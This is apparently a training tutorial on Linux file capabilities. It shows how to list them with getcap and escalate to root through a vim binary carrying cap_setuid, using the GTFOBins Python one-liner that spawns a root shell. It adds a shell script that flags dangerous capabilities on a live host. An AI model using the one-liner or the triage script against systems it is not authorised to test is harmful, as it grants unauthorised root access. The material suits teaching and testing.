Capabilities
System administrators can use "Capabilities" to hand a process or binary a specific privilege instead of full root. For instance, if a tool a SOC analyst runs needs to open raw sockets for packet capture, which a regular user cannot do, the administrator can add just that capability (cap_net_raw) to the binary with setcap rather than making it SUID root or granting sudo. The binary can then perform its task without the user holding elevated rights. The flip side matters for privilege escalation: a file capability such as cap_setuid+ep makes the binary as powerful as a SUID-root copy for that one operation, yet ls -l shows no s bit, so capabilities must be enumerated separately from SUID binaries.
We can use the getcap tool to list enabled file capabilities. Run it recursively from / and redirect stderr to /dev/null, otherwise the "Permission denied" errors from directories we cannot read clutter the output:
getcap -r / 2>/dev/null

We can see that both vim and view have capabilities set (the setuid(0) trick below requires cap_setuid in the effective set, i.e. cap_setuid+ep), but as we can see from the image below neither has the SUID bit set, so a search for SUID binaries alone would have missed them.

We can look up the binary on GTFOBins, whose "Capabilities" section lists a way to leverage it for privilege escalation.

Use the command with py or py3 according to which Python interface the vim binary was built with (vim --version shows +python or +python3; if both are absent this technique does not apply), and point it at the binary getcap reported (GTFOBins writes ./vim because it works on a copy in the current directory):
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

And we successfully escalate our privileges: the capability let the Python interpreter inside vim call setuid(0) and exec a root shell without the binary ever being SUID.
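As an added example (not part of the original page and not GTFOBins' code), the following POSIX shell script automates the two checks above: it triages getcap output for capabilities that commonly lead straight to root, and it reads vim --version to decide whether the one-liner needs :py or :py3. It assumes getcap prints either the older "path = caps+flags" or the newer "path caps=flags" format; the DANGEROUS_CAPS list is this example's own selection, and the getcap and vim --version excerpts embedded in it are constructed samples, not output from a real host.

```shell
#!/bin/sh
# Added example, not from the original page: triage file capabilities and pick
# the vim Python flavour. Assumes getcap output in either libcap format.

# Constructed getcap output covering both formats (not from a real host).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/vim = cap_setuid+ep
/usr/bin/view cap_setuid=ep
/usr/bin/python3.8 = cap_dac_override,cap_sys_admin+ep
/usr/sbin/capsh = cap_setuid+p cap_net_raw+ep'

# Constructed excerpt of `vim --version` (not from a real host).
SAMPLE_VIM_VERSION='VIM - Vi IMproved 8.1 (constructed sample)
+cmdline_info      -python            +python3           +quickfix'

# Capabilities that let the caller become root or bypass file permissions
# outright (this example's own list). cap_net_raw is left out on purpose:
# it is common (ping) and only grants packet access, not root.
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# flag_dangerous: read getcap lines on stdin and print "path cap" for each
# dangerous capability. A capability that is only permitted (+p without e)
# is still printed but marked, because a binary that is not capability-aware,
# such as vim, cannot use it unless it raises it first.
flag_dangerous() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}            # first field is the file (paths with spaces are not handled)
    spec=${line#* }             # "= cap_setuid+ep" (old format) or "cap_setuid=ep" (new format)
    spec=${spec#"= "}
    for clause in $spec; do     # one file may carry several clauses, e.g. "cap_setuid+p cap_net_raw+ep"
      flags=${clause##*[+=]}    # "ep", "eip", "p" ...
      names=${clause%[+=]*}     # "cap_setuid" or "cap_dac_override,cap_sys_admin"
      case "$flags" in
        *e*) note='' ;;
        *)   note=' (permitted only)' ;;
      esac
      for name in $(printf '%s' "$names" | tr ',' ' '); do
        case " $DANGEROUS_CAPS " in
          *" $name "*) printf '%s %s%s\n' "$path" "$name" "$note" ;;
        esac
      done
    done
  done
}

# pick_py_cmd: read `vim --version` output on stdin and print py3, py or none,
# i.e. which :py command the GTFOBins one-liner must use.
pick_py_cmd() {
  feats=$(tr -s ' \t' '\n')
  if printf '%s\n' "$feats" | grep -Fxq -e '+python3' -e '+python3/dyn'; then
    echo py3
  elif printf '%s\n' "$feats" | grep -Fxq -e '+python' -e '+python/dyn'; then
    echo py
  else
    echo none
  fi
}

# Stand-alone demo over the constructed samples; pass --live to triage the real host.
if [ "${1:-}" = "--live" ]; then
  getcap -r / 2>/dev/null | flag_dangerous
  printf 'vim python flavour: %s\n' "$(vim --version 2>/dev/null | pick_py_cmd)"
else
  printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous
  printf 'vim python flavour: %s\n' "$(printf '%s\n' "$SAMPLE_VIM_VERSION" | pick_py_cmd)"
fi
```

Over the constructed sample the script reports vim, view and python3.8 as candidates and marks capsh's cap_setuid as permitted only, while ping is ignored; on a real host run it with --live after the getcap step above. A "permitted only" hit is worth a second look if the binary is capability-aware (it can raise the capability itself), but the vim one-liner on this page needs the effective bit.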